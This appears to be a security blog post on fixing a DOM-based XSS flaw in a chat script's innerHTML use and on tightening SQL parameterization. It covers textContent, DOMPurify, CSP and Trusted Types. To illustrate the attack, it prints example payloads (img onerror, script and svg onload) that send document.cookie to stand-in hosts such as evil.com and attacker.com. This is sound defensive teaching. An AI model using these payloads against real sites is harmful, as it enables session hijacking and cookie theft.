When innerHTML Meets User Data: Fixing XSS Vulnerabilities in JavaScript
Introduction
Cross-Site Scripting (XSS) is one of the most persistent and misunderstood vulnerabilities in web development. It consistently appears in the OWASP Top 10 — not because it's exotic or difficult to understand, but because it's surprisingly easy to introduce accidentally, especially when working with dynamic content in JavaScript.
In this post, we'll walk through a real-world fix applied to opencontext/web/static/js/agent_chat.js, where user-controlled data was being passed into DOM manipulation methods like innerHTML. We'll also dig into a related backend fix that tightened up SQL query construction. Together, these changes represent the kind of defense-in-depth thinking that separates secure applications from vulnerable ones.
Whether you're a junior developer just learning about XSS or a senior engineer doing a security review, this post will give you practical, actionable knowledge.
What Is This Vulnerability?
At its core, this vulnerability is about trusting user input too much, too early.
When JavaScript code takes a string that originates from user input — a chat message, a username, a URL parameter — and directly injects it into the DOM using methods like:
element.innerHTML = userInput;
element.outerHTML = userInput;
document.write(userInput);
...it opens the door for an attacker to inject arbitrary HTML and JavaScript into the page.
This is the essence of a DOM-based XSS vulnerability (CWE-79: Improper Neutralization of Input During Web Page Generation).
Why Should Developers Care?
You might be thinking: "It's rated low severity — how bad can it really be?"
Here's the thing about XSS: its severity is heavily context-dependent. A low-severity XSS in an isolated component can become a critical vulnerability when:
- The affected page has access to authentication tokens or cookies
- The application handles sensitive personal or financial data
- The XSS can be stored (persisted in a database) and served to many users
- It's chained with other vulnerabilities like CSRF or open redirects
In a chat interface like agent_chat.js, user-generated content is the entire point of the feature. That makes XSS hygiene especially important — every message rendered is a potential injection point.
The Vulnerability Explained
Technical Details
Let's look at the anti-pattern at the heart of this issue:
// ❌ VULNERABLE: Directly injecting user-controlled content into innerHTML
function renderMessage(userMessage) {
  const chatContainer = document.getElementById('chat-messages');
  chatContainer.innerHTML += `<div class="message">${userMessage}</div>`;
}
When userMessage contains something innocent like "Hello, world!", this works fine. But what if an attacker (or a mischievous user) sends this instead?
<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
The browser parses that as valid HTML, tries to load the image, fails, and runs the onerror handler, silently sending every cookie readable from JavaScript (that is, every cookie not marked HttpOnly) to an attacker-controlled server.
How Could It Be Exploited?
Attack Scenario: Cookie Theft in a Chat Interface
- An attacker opens the chat interface and sends a message containing a malicious payload.
- If the message is stored server-side (stored XSS), every user who opens the chat later will have the script execute in their browser.
- If it's reflected (the attacker shares a crafted URL), the victim clicks the link and the script executes immediately.
- The script exfiltrates the session cookie, which the attacker uses to impersonate the victim.
// Classic payload for reflected XSS or document.write() sinks
// (a <script> element inserted via innerHTML is parsed but not executed):
<script>document.location='https://attacker.com/log?c='+document.cookie</script>
// Or more subtle, using an event handler instead of a script element:
<svg onload="new Image().src='https://attacker.com/?x='+btoa(document.cookie)">
What's the Real-World Impact?
| Impact Type | Description |
|---|---|
| Session Hijacking | Steal authentication cookies to impersonate users |
| Credential Harvesting | Inject fake login forms to capture passwords |
| Malware Distribution | Redirect users to malicious downloads |
| Defacement | Alter the visual appearance of the page |
| Keylogging | Capture everything a user types |
| Cryptojacking | Run cryptocurrency miners in the victim's browser |
The Fix
What Changed?
The fix addresses the unsafe DOM manipulation pattern in agent_chat.js by replacing direct innerHTML assignment with safer alternatives. The principle is simple: never hand raw user input to the browser's HTML parser.
Before: The Vulnerable Pattern
// ❌ BEFORE: User content injected directly as HTML
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');
  messageDiv.innerHTML = response; // 🚨 Dangerous!
}
// ❌ Also dangerous with template literals:
chatLog.innerHTML += `
  <div class="chat-bubble user">
    ${userInput}
  </div>
`;
After: The Safe Pattern
// ✅ AFTER: Using textContent for plain text
function displayAgentResponse(response) {
  const messageDiv = document.getElementById('agent-response');
  const bubble = document.createElement('div');
  bubble.className = 'chat-bubble agent';
  bubble.textContent = response; // ✅ Safe: treated as plain text, not HTML
  messageDiv.appendChild(bubble);
}
// ✅ Or using DOM APIs to build structure safely:
function renderUserMessage(userInput) {
  const chatLog = document.getElementById('chat-log');
  const wrapper = document.createElement('div');
  wrapper.className = 'chat-bubble user';
  wrapper.textContent = userInput; // ✅ No HTML parsing
  chatLog.appendChild(wrapper);
}
Why Does This Fix Work?
The key difference is how the browser interprets the content:
| Method | Interpretation | Safe for User Input? |
|---|---|---|
| innerHTML = userInput | Parsed as HTML | ❌ No |
| outerHTML = userInput | Parsed as HTML | ❌ No |
| document.write(userInput) | Parsed as HTML | ❌ No |
| textContent = userInput | Treated as plain text | ✅ Yes |
| createTextNode(userInput) | Treated as plain text | ✅ Yes |
| setAttribute('data-x', userInput) | Attribute value (with caveats) | ⚠️ Context-dependent |
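When you use textContent, the browser never runs the HTML parser on the value. Characters like <, >, and & are stored literally in a text node (if the element is later serialized, they appear as &lt;, &gt;, and &amp;). The content is displayed exactly as typed, so no markup is created and no script can execute.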
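The "context-dependent" caveat on setAttribute in the table mostly concerns URL-bearing attributes such as href and src, where a value like javascript:... is still dangerous even though no HTML parsing occurs. A minimal sketch of an allowlist check follows; isSafeHttpUrl and the placeholder base URL are hypothetical and not taken from agent_chat.js.

```javascript
// Hypothetical helper: accept only http(s) URLs before using a value in href/src.
// `base` is an assumed placeholder so that relative paths can be resolved.
function isSafeHttpUrl(value, base = 'https://example.invalid/') {
  let url;
  try {
    // The URL parser trims surrounding whitespace and lowercases the scheme,
    // so variants like "  JaVaScRiPt:..." are normalized before the check.
    url = new URL(value, base);
  } catch {
    return false; // unparseable input is rejected
  }
  return url.protocol === 'http:' || url.protocol === 'https:';
}
```

In the browser this could guard an assignment such as `if (isSafeHttpUrl(userUrl)) link.setAttribute('href', userUrl);`. An allowlist of schemes is used here rather than a blocklist, since it fails closed for schemes nobody thought to list.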
The Backend Fix: Parameterized SQL Queries
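The PR also included a backend change in sqlite_backend.py. While not directly related to the XSS issue, it's worth understanding because it rests on the same core principle: never concatenate user-controlled data into executable strings. Note that the earlier code, as shown here, already bound each tag value through a ? placeholder; what the change tightens is how the query text itself is assembled, replacing a loop-built chain of OR conditions with a single IN clause.
Before (OR conditions assembled in a loop):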
# ❌ BEFORE: Building SQL conditions in a loop, concatenating strings
tag_conditions = []
for tag in tags:
    tag_conditions.append("document_tags.tag = ?")
    params.append(tag.lower())
if tag_conditions:
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE {" OR ".join(tag_conditions)})'
    )
After (Safe Parameterized Query):
# ✅ AFTER: Using IN clause with proper placeholders
if tags:
    # Use proper parameterized query for tags
    tag_placeholders = ",".join(["?"] * len(tags))
    where_conditions.append(
        f'id IN (SELECT document_id FROM document_tags WHERE tag IN ({tag_placeholders}))'
    )
    for tag in tags:
        params.append(tag.lower())
The new approach generates a clean IN (?, ?, ?) clause where the number of placeholders exactly matches the number of tags. The database driver handles the safe binding of values, ensuring no tag value can ever break out of its intended context and modify the query structure.
This is the SQL equivalent of using textContent instead of innerHTML — keep data as data, never let it become code.
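To make the "data stays data" point concrete, here is the same placeholder-building idea ported to JavaScript purely for illustration. The function name buildTagFilter and its return shape are assumptions; the actual backend code is the Python shown above.

```javascript
// Hypothetical JavaScript port of the placeholder logic; not the project's code.
function buildTagFilter(tags) {
  if (!Array.isArray(tags) || tags.length === 0) {
    return { clause: '', params: [] }; // no tags: contribute nothing to the WHERE clause
  }
  // One "?" per tag. Only the COUNT of tags influences the SQL text.
  const placeholders = tags.map(() => '?').join(',');
  return {
    clause: `id IN (SELECT document_id FROM document_tags WHERE tag IN (${placeholders}))`,
    // Values travel separately and are bound by the database driver.
    params: tags.map((tag) => String(tag).toLowerCase()),
  };
}

// A hostile tag changes the bound values, never the query text.
const hostile = buildTagFilter(['news', "x') OR 1=1 --"]);
console.log(hostile.clause); // ...WHERE tag IN (?,?))
console.log(hostile.params); // [ 'news', "x') or 1=1 --" ]
```

The SQL string depends only on how many tags were supplied, so no tag value can alter the statement's structure.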
Prevention & Best Practices
1. Default to textContent for User-Generated Content
Make this your mental default: if it's user input, use textContent.
// ✅ The golden rule
element.textContent = userInput; // Always safe for display
Only reach for innerHTML when you genuinely need to render HTML structure — and when you do, ensure the content comes from a trusted source or has been sanitized.
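Where an HTML string genuinely has to be assembled around user text, one option is to entity-escape the text before interpolating it. The sketch below is a minimal version of that idea; escapeHtml and messageMarkup are hypothetical helpers, not part of agent_chat.js, and the escaping covers only element content and quoted attribute values, not URL or script contexts.

```javascript
// Characters that can change how the HTML parser reads text or quoted attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Hypothetical helper: replace each special character with its entity.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical helper: the markup is fixed; only escaped text is interpolated.
function messageMarkup(userMessage) {
  return `<div class="message">${escapeHtml(userMessage)}</div>`;
}

console.log(messageMarkup('<img src=x onerror="a&b">'));
// <div class="message">&lt;img src=x onerror=&quot;a&amp;b&quot;&gt;</div>
```

Even with a helper like this available, textContent remains the simpler choice whenever the output is plain text, because it removes the opportunity to forget the escaping step.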
2. Use a Trusted HTML Sanitization Library
When you do need to render rich text from users (think: markdown editors, comment sections with formatting), use a well-maintained sanitization library:
// Using DOMPurify — the industry standard
import DOMPurify from 'dompurify';
const cleanHTML = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href']
});
element.innerHTML = cleanHTML; // ✅ Safe after sanitization
Recommended libraries:
- DOMPurify — Fast, well-tested, browser-focused
- sanitize-html — Good for Node.js environments
- xss — Configurable XSS filter
3. Implement a Content Security Policy (CSP)
A strong CSP header acts as a second line of defense. Even if XSS code is injected, a well-configured CSP can prevent it from executing or exfiltrating data:
Content-Security-Policy:
default-src 'self';
script-src 'self' 'nonce-{random-nonce}';
connect-src 'self' https://api.yourapp.com;
img-src 'self' data:;
style-src 'self' 'unsafe-inline';
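With this script-src value, inline scripts and inline event handlers injected via XSS won't execute: they carry no valid nonce, and 'unsafe-inline' is not allowed for scripts. The nonce must be freshly generated and unpredictable for every response.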
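A nonce only helps if it is regenerated per response. The following is a rough Node.js sketch of how a server might produce one and assemble the header above; newNonce and buildCsp are hypothetical names, and the directive values simply mirror the example policy.

```javascript
const { randomBytes } = require('node:crypto');

// Hypothetical helper: 16 random bytes, base64-encoded, generated per response.
function newNonce() {
  return randomBytes(16).toString('base64');
}

// Hypothetical helper: assemble the header value for the example policy.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "connect-src 'self' https://api.yourapp.com",
    "img-src 'self' data:",
    "style-src 'self' 'unsafe-inline'",
  ].join('; ');
}

const nonce = newNonce();
console.log(buildCsp(nonce));
```

The same nonce value would then be placed on each legitimate script tag in that response (as a nonce attribute), which is what lets the browser distinguish the page's own inline scripts from injected ones.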
4. Enable Trusted Types (Modern Browsers)
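Trusted Types is a browser API that, once enforced through CSP, makes sinks such as innerHTML reject plain strings and accept only values produced by a policy function:
// Define a named Trusted Types policy ('sanitized-html' is an illustrative name).
// Avoid the name 'default' here: a policy called 'default' is applied
// automatically to plain strings, so the raw assignment below would not throw.
const policy = trustedTypes.createPolicy('sanitized-html', {
  createHTML: (input) => DOMPurify.sanitize(input)
});
// With enforcement on, innerHTML only accepts TrustedHTML objects
element.innerHTML = policy.createHTML(userInput); // ✅ Goes through sanitizer
element.innerHTML = userInput; // ❌ Throws a TypeError when enforcement is enabled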
Enable it via CSP:
Content-Security-Policy: require-trusted-types-for 'script'
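Not every browser ships Trusted Types, so code that calls trustedTypes.createPolicy unconditionally can fail where the API is missing. One possible approach is a small wrapper that feature-detects the API and otherwise falls back to an object with the same createHTML shape. The helper name createHtmlPolicy and its parameters are assumptions made for this sketch.

```javascript
// Hypothetical helper.
//   scope    - the global object (window in a browser)
//   name     - policy name, e.g. 'sanitized-html'
//   sanitize - a string -> string sanitizer, e.g. (s) => DOMPurify.sanitize(s)
function createHtmlPolicy(scope, name, sanitize) {
  const rules = { createHTML: (input) => sanitize(input) };
  if (scope.trustedTypes && typeof scope.trustedTypes.createPolicy === 'function') {
    // Trusted Types available: createHTML will return TrustedHTML objects.
    return scope.trustedTypes.createPolicy(name, rules);
  }
  // Fallback: same call shape, but createHTML returns a plain sanitized string.
  return rules;
}
```

In a browser this might be used as `const policy = createHtmlPolicy(window, 'sanitized-html', (s) => DOMPurify.sanitize(s));` followed by `element.innerHTML = policy.createHTML(userInput);`, so the call site reads the same whether or not the API exists.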
5. Use Static Analysis Tools
Don't rely solely on code review to catch these patterns. Integrate automated scanning:
| Tool | Type | What It Catches |
|---|---|---|
| Semgrep | SAST | Custom rules for innerHTML, outerHTML patterns |
| ESLint + eslint-plugin-no-unsanitized | Linter | Flags unsafe DOM assignments |
| Snyk Code | SAST | Taint analysis for XSS data flows |
| CodeQL | SAST | Deep semantic analysis of XSS sinks |
| OWASP ZAP | DAST | Runtime XSS detection |
The vulnerability in this post was caught by Semgrep using the rule javascript.browser.security.insecure-document-method.insecure-document-method — exactly the kind of automated guardrail every team should have in their CI/CD pipeline.
6. Follow the Principle of Least Privilege for DOM Access
- Avoid document.write() entirely; it's a legacy API with no safe use cases in modern code
- Prefer framework-provided templating (React's JSX, Angular's template binding) which escape by default
- In React, treat dangerouslySetInnerHTML as a code smell requiring explicit review
// ✅ React escapes this automatically
function ChatMessage({ text }) {
  return <div className="message">{text}</div>;
}
// ❌ Bypasses React's escaping — use only with sanitized content
function RichMessage({ html }) {
  return <div dangerouslySetInnerHTML={{ __html: html }} />;
}
Security Standards & References
- OWASP: Cross Site Scripting Prevention Cheat Sheet
- CWE-79: Improper Neutralization of Input During Web Page Generation
- OWASP Top 10: A03:2021 – Injection
- MDN: Trusted Types API
- Google Security Blog: Preventing DOM-based XSS with Trusted Types
Conclusion
The vulnerability fixed in this PR is a classic example of how convenience and security can come into conflict. innerHTML is powerful and easy to use — that's exactly why it's dangerous when combined with user-controlled data.
The key takeaways from this fix are:
- User input is untrusted by default — treat it as data, never as markup or code
- textContent is your friend: it's the safe default for rendering user-provided strings
- When you need HTML, sanitize first: use DOMPurify or equivalent before touching innerHTML
- Defense in depth matters: CSP and Trusted Types add layers that catch what code review misses
- The same principle applies everywhere — whether it's HTML injection in the browser or SQL injection in the backend, the fix is the same: parameterize and separate data from code
Security vulnerabilities like XSS aren't signs of bad developers — they're signs of missing guardrails. By integrating static analysis tools like Semgrep into your CI/CD pipeline and establishing clear coding standards around DOM manipulation, you can catch these issues before they ever reach production.
Secure code is a habit, not an afterthought. Keep building it.